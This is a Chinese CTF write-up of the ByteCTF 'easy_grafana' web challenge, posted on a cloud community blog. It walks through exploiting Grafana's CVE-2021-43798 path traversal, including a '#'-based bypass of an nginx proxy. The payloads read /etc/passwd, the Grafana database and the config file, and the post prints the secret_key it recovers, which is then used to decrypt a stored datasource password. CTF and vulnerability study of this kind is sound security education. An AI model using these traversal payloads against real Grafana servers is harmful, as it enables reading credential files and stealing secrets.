前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >ByteCTF-web复现

ByteCTF-web复现

作者头像
pankas
发布2022-10-05 16:23:46
2170
发布2022-10-05 16:23:46
举报

easy_grafana

打开发现是grafana的登录界面,下面有对应的版本号,直接网上搜一搜有无对应的CVE

找到了 CVE-2021-43798 ,存在任意文件读取漏洞

网站做了nginx的反代,直接用现有的payload访问会报400的错误

image-20220927203421538
image-20220927203421538

参考https://blog.riskivy.com/grafana-%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e8%af%bb%e5%8f%96%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%e4%b8%8e%e6%b1%87%e6%80%bbcve-2021-43798/

构造

/public/plugins/text/#/../../../../../../../../../../etc/passwd

可实现任意文件读取

但更目录没有flag,环境变量文件也是空的,但是可以读取数据库文件和配置文件

/public/plugins/text/#/../../../../../../../../../../var/lib/grafana/grafana.db

读取下载得到数据库文件

image-20220927204100104
image-20220927204100104

使用navicat打开

image-20220927204158798
image-20220927204158798

但也没有找到flag

尝试使用工具解密数据库文件中的内容

工具 https://github.com/jas502n/Grafana-CVE-2021-43798

image-20220927204416856
image-20220927204416856

读取 配置文件

/public/plugins/text/#/../../../../../../../../../../etc/grafana/grafana.ini

得到 secret_key

secret_key = SW2YcwTIb9zpO1hoPsMm

得到的数据库文件中找到data_source的密码

image-20220927215248098
image-20220927215248098

得到 dataSourcePassword

{"password":"b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/"}

解密mysql 数据库密码得到flag

image-20220927214929318
image-20220927214929318
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-09-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • easy_grafana
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档